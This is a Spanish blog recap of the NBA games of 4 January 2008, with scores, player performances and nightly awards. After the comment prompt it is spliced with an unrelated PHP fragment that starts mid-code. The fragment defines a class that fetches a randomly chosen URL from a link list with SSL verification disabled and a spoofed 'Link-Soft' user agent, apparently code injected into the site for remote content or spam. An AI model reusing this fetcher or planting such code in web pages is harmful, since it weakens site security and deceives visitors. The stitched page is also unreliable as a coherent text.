La crónica (04/01/2008)

05 de January de 2008 por txusma

Noche de partidos en la NBA, noche de emociones. Hasta 12 partidos se disputaron y cada uno de ellos nos dejó detalles importantes que comentar. Detroit demostró su solidez ante unos siempre difíciles Raptors (DET 101 – TOR 85). El equipo de Calderón, que jugó un buen partido y que está perfectamente afianzado como titular, se estrelló contra unos Pistons que empiezan a carburar camino de las Finales. En Orlando vivimos un final de infarto con un bandeja de Rafer Alston en los últimos segundos que dio la victoria a Houston (HOU 96 – ORL 94). Los Magic están pasando por momentos complicados y tienen que volver a recuperar las buenas sensaciones del inicio de campaña. Otro partido resuelto en los minutos finales fue el Sacramento – Cleveland. Daniel Gibson remató el buen trabajo de Lebron James con un triple a falta de 11 segundos que aseguró la victoria de los Cavs (SAC 93 – CLE 97). Las palizas de la jornada las vivimos en Indiana, Washington y Los Angeles: los Pacers ganaron a Atlanta de 20 puntos (ATL 91 – IND 113) y reafirman su candidatura a los playoffs contra un rival directo, los Wizards se cebaron en unos desdibujados Bucks (WAS 101 – MIL 77) que no pudieron contar con su estrella Michael Redd y Los Lakers arrollaron literalmente a Philadelphia (PHI 93 – LAL 124) con actuación estelar de Bynum (una más) que recogió 16 rebotes, récord en su cárrera. Los actuales campeones sufrieron más de la cuenta ante los Knicks (NY 93 – SA 97) y mucho queda explicado si decimos que Bruce Bowen fue el máximo anotador de su equipo con 15 puntos. Por su parte, Dallas empieza a calentar motores intentando llegar en plenitud de facultades a los playoffs y se deshacieron de sus verdugos en sus últimas finales (MIA 89 – DAL 94). Miami dio mucha guerra a pesar de las bajas de Dwyane Wade y Saquille O’Neal, a priori sus principales figuras.

Los Grizzlies por su parte estuvieron cerca de dar la sorpresa en la cancha de Boston aunque nunca se les vio con posibilidades reales de llevarse el choque (MEM 96 – BOS 100). Navarro, que anotó 20 puntos en 17 minutos, y Gasol, que se quedó en unos tristes 12 puntos y 8 rebotes, fueron superados por Paul Pierce y Kevin Garnett, que dominaron el partido a su antojo. Los Nets comandados por un Jason Kidd que consiguió el triple doble número 95 de su carrera, ganaron a los Bobcats (CHA 96 – NJ 102) y se sitúan por fin con el 50% de victorias. Por su parte Denver continúa como líder en la división Northwest, gracias a su victoria frente a Minnessota (DEN 118 – MIN 107) en un partido que los de Colorado demostraron un gran nivel de juego y que dominaron de principio a fin. Y otro partido con puntuaciones altas fue el New Orleans – Warriors (NO 116 – GS 104), partido en el que Chris Paul se exhibió una vez más, Pedja Stojakovic anotó 6 triples y Tyson Chandler recogió 22 rebotes.

El MVP de la noche: En un equipo como los Wolves con un solo líder claro, cada noche otro jugador de la plantilla asume el rol anotador y nos puede deleitar con una gran actuación. La gracia es que, Al Jefferson, aparte este jugador es siempre diferente. Esta noche Rashad McCants ha acabado el partido con 34 puntos, 5 rebotes, 4 asistencias y un acierto en el tiro del 60%. Una actuación de auténtico MVP.

El rookie de la noche: Disputada esta categoria con varios rookies aprovechando los minutos recibidos. Finalmente nuestro galardón de hoy para Thaddeus Young que en la abultada derrota de los Sixers aprovechó sus minutos en cancha para acabar con unos interesantes 16 puntos y 9 rebotes.

La sorpresa de la noche: Como comentábamos anteriormente ésta ha sido la noche de los rookies y nos vemos obligados a entregar este premio ex aquo a Javaris Crittenton de los Lakers y Daequan Cook de los Heat. El primero jugó el mejor partido de la temporada acabando con 19 puntos en 24 minutos y el segundo jugó su primer partido como titular y finalizó con 15 puntos y dejando muy buenas sensaciones.

La decepción de la noche: Nadie pone en duda la calidad y el talento que atesora Ray Allen pero su actuación de hoy no se puede calificar de otra cosa que sonrojante. Nada más y nada menos que un 0-9 en tiros de campos en 35 minutos, para un total de 2 puntos. Suerte que apareción el otro Allen del equipo para cubrirle las espaldas.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>